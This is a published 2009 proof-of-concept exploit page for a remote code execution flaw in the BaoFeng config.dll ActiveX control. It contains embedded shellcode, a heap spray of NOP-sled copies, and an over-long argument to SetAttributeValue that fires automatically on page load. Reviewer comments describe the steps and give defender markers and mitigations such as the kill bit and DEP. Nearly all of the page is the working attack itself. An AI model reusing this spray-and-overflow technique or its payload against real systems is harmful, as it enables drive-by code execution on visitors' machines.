# Title : BaoFeng (config.dll) ActiveX Remote Code Execution Exploit
# Published : 2009-05-21
# Author : etirah
#
# BaoFeng (config.dll) ActiveX Remote Code Execution Exploit
# Exploit made by etirah
# Download: www.baofeng.com
#
# Vulnerable DLL       : config.dll
# Vulnerable function  : SetAttributeValue(param1,param2,param3)
# Vulnerable parameter : param1
#
# References:
# 1. http://forum.eviloctal.com/viewthread.php?tid=35051
# 2. http://www.milw0rm.com/exploits/8579
<html>
<body>
<object classid="clsid:BD103B2B-30FB-4F1E-8C17-D8F6AADBCC05" id="target"></object>
<script>
/**
 * Proof-of-concept driver for the config.dll SetAttributeValue issue described
 * in the header of this page. It runs in three stages: build a payload string,
 * fill the script heap with many large copies of filler + payload, then call
 * SetAttributeValue on `target` with an over-long first argument.
 *
 * `target` is not defined in this function; it is the <object id="target">
 * element the page instantiates with classid
 * BD103B2B-30FB-4F1E-8C17-D8F6AADBCC05.
 *
 * Defender view: the recognisable markers are that classid, a first argument to
 * SetAttributeValue made of one escape value repeated hundreds of times, and a
 * loop that stores hundreds of large identical strings in an array. Setting the
 * ActiveX kill bit for that CLSID, or removing or updating the control, closes
 * the path from a web page to the method; DEP, where enforced for the browser
 * process, blocks execution of data placed on the heap this way.
 *
 * Takes no parameters and returns nothing. `fillblock`, `block`, `memory` and
 * `x` are assigned without `var`, so they become globals on the page.
 */
function test()
{
// Payload string, kept exactly as it appears on the page. The original author's
// note here read "show messagebox"; that description is not verified in this review.
var shellcode = unescape("u68fcu0a6au1e38u6368ud189u684fu7432u0c91uf48bu7e8du33f4ub7dbu2b04u66e3u33bbu5332u7568u6573u5472ud233u8b64u305au4b8bu8b0cu1c49u098bu698buad08u6a3du380au751eu9505u57ffu95f8u8b60u3c45u4c8bu7805ucd03u598bu0320u33ddu47ffu348bu03bbu99f5ube0fu3a06u74c4uc108u07caud003ueb46u3bf1u2454u751cu8be4u2459udd03u8b66u7b3cu598bu031cu03ddubb2cu5f95u57abu3d61u0a6au1e38ua975udb33u6853u6574u7473uc48bu6853u3a20u292du7468u2065u6820u6168u6972ud48bu5053u5352u57ffu53fcu57ffu00f8");
// Filler seed: two UTF-16 units of 0x9090, i.e. 0x90 bytes (the x86 NOP opcode).
var bigblock = unescape("%u9090%u9090");
// Size bookkeeping for one sprayed string.
// NOTE(review): 20 is presumably an allowance for the string's allocation header - confirm.
var headersize = 20;
var slackspace = headersize+shellcode.length;
// Double the filler until it is at least slackspace units long.
while (bigblock.length<slackspace)
bigblock+=bigblock;
// fillblock: exactly slackspace units of filler; block: the filler minus slackspace units.
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
// Grow block until block plus slackspace reaches at least 0x40000 UTF-16 units.
while(block.length+slackspace<0x40000)
block = block+block+fillblock;
// Heap spray: 300 array entries, each a fresh concatenation of filler and payload.
// The array keeps every copy referenced for the lifetime of the page.
memory = new Array();
for (x=0; x<300; x++)
memory[x] = block + shellcode;
// Over-long argument: 0x0c0c units appended two at a time until the string is 264 units long.
// NOTE(review): the repeated value presumably stands for an address inside the sprayed
// region (0x0c0c0c0c) - inferred from the pattern, not stated on the page.
var buffer = '';
while (buffer.length < 264)
buffer+=unescape("%u0c0c%u0c0c");
// Trigger: the over-long string goes in as the first argument, which the page header names
// as the vulnerable parameter; the second and third arguments are short fixed strings.
target.SetAttributeValue(buffer, ":-)", "(-:");
}
// Called inline while the page is being parsed, so the sequence runs on load with no user interaction.
test();
</script>
</body>
</html>